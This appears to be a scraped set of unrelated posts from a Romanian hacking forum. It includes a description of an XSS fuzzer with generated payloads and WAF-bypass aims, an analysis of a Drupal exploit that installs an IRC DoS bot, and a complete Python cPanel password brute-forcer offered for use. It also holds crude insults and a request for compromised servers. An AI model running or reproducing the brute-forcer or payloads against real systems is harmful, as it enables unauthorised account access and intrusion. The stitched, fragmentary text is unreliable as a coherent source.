Leaderboard

Iti folosesti limba dupa cum te indrumneaza cel care ti-a dat aprobare si speri ca ii se face mila de tine

What is XSS Fuzzer? XSS Fuzzer is a simple application written in plain HTML/JavaScript/CSS which generates XSS payloads based on user-defined vectors using multiple placeholders which are replaced with fuzzing lists. It offers the possibility to just generate the payloads as plain-text or to execute them inside an iframe. Inside iframes, it is possible to send GET or POST requests from the browser to arbitrary URLs using generated payloads. Why? XSS Fuzzer is a generic tool that can be useful for multiple purposes, including: Finding new XSS vectors, for any browser Testing XSS payloads on GET and POST parameters Bypassing XSS Auditors in the browser Bypassing web application firewalls Exploiting HTML whitelist features Example In order to fuzz, it is required to create placeholders, for example: The [TAG] placeholder with fuzzing list img svg. The [EVENT] placeholder with fuzzing list onerror onload. The [ATTR] placeholder with fuzzing list src value. The payloads will use the mentioned placeholders, such as: <[TAG] [ATTR]=Something [EVENT]=[SAVE_PAYLOAD] /> The [SAVE_PAYLOAD] placeholder will be replaced with JavaScript code such as alert(unescape('[PAYLOAD]'));. This code is triggered when an XSS payload is successfully executed. The result for the mentioned fuzzing lists and payload will be the following: <img src=Something onerror=alert(unescape('%3Cimg%20src%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <img value=Something onerror=alert(unescape('%3Cimg%20value%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <img src=Something onload=alert(unescape('%3Cimg%20src%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <img value=Something onload=alert(unescape('%3Cimg%20value%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <svg src=Something onerror=alert(unescape('%3Csvg%20src%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <svg value=Something onerror=alert(unescape('%3Csvg%20value%3DSomething%20onerror%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <svg src=Something onload=alert(unescape('%3Csvg%20src%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> <svg value=Something onload=alert(unescape('%3Csvg%20value%3DSomething%20onload%3D%5BSAVE_PAYLOAD%5D%20/%3E')); /> When it is executed in a browser such as Mozilla Firefox, it will alert the executed payloads: <svg src=Something onload=[SAVE_PAYLOAD] /> <svg value=Something onload=[SAVE_PAYLOAD] /> <img src=Something onerror=[SAVE_PAYLOAD] /> Sending requests It is possible to use a page vulnerable to XSS for different tests, such as bypasses for the browser XSS Auditor. The page can receive a GET or POST parameter called payload and will just display its unescaped value. Contact The application is in beta state so it might have bugs. If you would like to report a bug or provide a suggestion, you can use the GitHub repository or you can send me an email to contact [a] xssfuzzer.com. Link: https://xssfuzzer.com/

Daca ma poti ajuta si pe mine cu numarul lui ma-ta, am nevoie, i-am promis unui prieten.

=))))))))))))))))))))))))))))))

Cine-i Independendet??

Muie bre!

@Nytro

Incearca daca este prezenta o vulnerabilitate in drupal si executa prin functia passthru (php) doua comenzi: - Descarca un script perl care este un bot de IRC utilizat pentru scanning, dos - Executa acel script Vulnerabilitatea despre care este vorba este aici: https://www.drupal.org/sa-core-2018-002 Serverul de IRC ruleaza pe adresa ip 82.165.172.97 / port 8080 # quick test macbook:~$ nc -vvvv 82.165.172.97 8080 found 0 associations found 1 connections: 1: flags=82<CONNECTED,PREFERRED> outif en0 src 10.0.0.31 port 55610 dst 82.165.172.97 port 8080 rank info not available TCP aux info available Connection to 82.165.172.97 port 8080 [tcp/http-alt] succeeded! :irc.roirc.me NOTICE AUTH :*** Looking up your hostname... :irc.roirc.me NOTICE AUTH :*** Found your hostname (cached) Botul de irc nu are autentificare si tine cont doar de nick-ul celui ce da comenzile: my @mast3rs = ("darkness","QuaD","AntMiner"); Procesul ce ruleaza in server apare ca "/usr/sbin/sshd". Singura diferenta este ca ruleaza pe userul sub care se executa php/apache my @fakeps = ("/usr/sbin/sshd"); Scriptul perl e facut de portughezi prin 2001. A fost modificat in timp de tot felul de script kiddie.

#!usr/bin/python import threading, time, random, sys, urllib2, httplib, base64 from copy import copy def title(): print "\n\t d3hydr8[at]gmail[dot]com cPanel BruteForcer v1.0" print "\t-----------------------------------------------------\n" def timer(): now = time.localtime(time.time()) return time.asctime(now) if len(sys.argv) !=5: title() print "\nUsage: ./cPanelbrute.py <server> <port> <userlist> <wordlist>\n" print "ex: python cPanelbrute.py example.com 2082 users.txt wordlist.txt\n" sys.exit(1) try: users = open(sys.argv[3], "r").readlines() except(IOError): print "Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[4], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: print "\nReloading Wordlist - Changing User\n" reloader() value = random.sample(words, 1) users.remove(users[0]) lock.release() if len(users) ==1: return users[0], value[0][:-1] else: return users[0][:-1], value[0][:-1] def getauth(url): req = urllib2.Request(url) try: handle = urllib2.urlopen(req) except IOError, e: pass else: print "This page isn't protected by basic authentication.\n" sys.exit(1) if not hasattr(e, 'code') or e.code != 401: print "\nThis page isn't protected by basic authentication." print 'But we failed for another reason.\n' sys.exit(1) authline = e.headers.get('www-authenticate', '') if not authline: print '\nA 401 error without a basic authentication response header - very weird.\n' sys.exit(1) else: return authline class Worker(threading.Thread): def run(self): username, password = getword() try: print "-"*12 print "User:",username,"Password:",password auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1]) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) urllib2.urlopen(server) print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n" except (urllib2.HTTPError, httplib.BadStatusLine), msg: #print "An error occurred:", msg pass title() if sys.argv[1][-1] == "/": sys.argv[1] = sys.argv[1][:-1] server = sys.argv[1]+":2082" if sys.argv[2].isdigit() == False: print "[-] Port must be a number\n" sys.exit(1) else: port = sys.argv[2] if sys.argv[1][-1] == "/": sys.argv[1] = sys.argv[1][:-1] server = sys.argv[1]+":"+port print "[+] Server:",server print "[+] Port:",port print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+]",getauth(server) print "[+] Started",timer(),"\n" for i in range(len(words)*len(users)): work = Worker() work.setDaemon(1) work.start() time.sleep(1) print "\n[-] Done -",timer(),"\n"

Poti folosi php pentru interfata, C# pentru engine, mysql/postgre pentru baze de date.

da el e senior

Salut la toti de pe rst am facut un tutorial despre exploit development sper sa placa Cuprins https://imageshack.com/i/0r20130612142230j youtube vimeo Win32 Exploit Development-01 on Vimeo Download Tools Win32Exploits Development-tools-01 Download Video+Tools Win32Exploits Development-Video+tools-01 Urmeaza o serie de tutoriale despre exploit development ps.respir mai greu in video sper sa nu va speriati am fost operat la plamin

Link download: https://mega.co.nz/#!69U1kSZK!K2tv9BdikXunJLu1_etQdUTmeSs0HHzACfQn2bnzJjc This is the booklet used during Sourcefire's SNORT Certified Proffesional course called Snort IDS/IPS + Rule Writing This 4-day class includes Snort IDS/IPS Technology and Rule Writing Best Practices. Students will learn how to build and manage a Snort sensor using open source tools, plug-ins, and the Snort rule language to help manage, tune, and deliver feedback on suspicious network activity. Hands-on labs help students construct solid, secure Snort installations and write Snort rules using proper syntax and structure. Overview Sourcefire provides a path for interested candidates to distinguish themselves through an industry respected certification program. Choose to become a Sourcefire Certified Administrator (SFCA), a Sourcefire Certified Professional (SFCP), a Sourcefire Certified Expert (SFCE) or a Snort Certified Professional (SnortCP). Each certification requires passing an online exam. You can achieve the SFCE designation by passing the SFCE exam and become an expert on all of the products, or you can take a specific exam that targets FireAMP, the Sourcefire System or even Snort if you are focused on a specific technology. Have Funk!

Saltut la toti de pe rst Tutorialul 2 din Win32 Exploit Development Buffer Overflow Cuprins: https://imageshack.com/i/mk20130612142252j Download tools win32 exploit development-tools-02 Download video si tools part1 EXploit-dev2.part1.rar part2 EXploit-dev2.part2.rar Video Win32 Exploit Development-02 on Vimeo video 01:26min

Salut, vad ca sunteti destul de multi in aceasta comunitate si sunt fericit ca m-am alaturat si eu ! Sunt la inceput si am nevoie de cateva root-uri ! Daca ma poate ajuta cineva!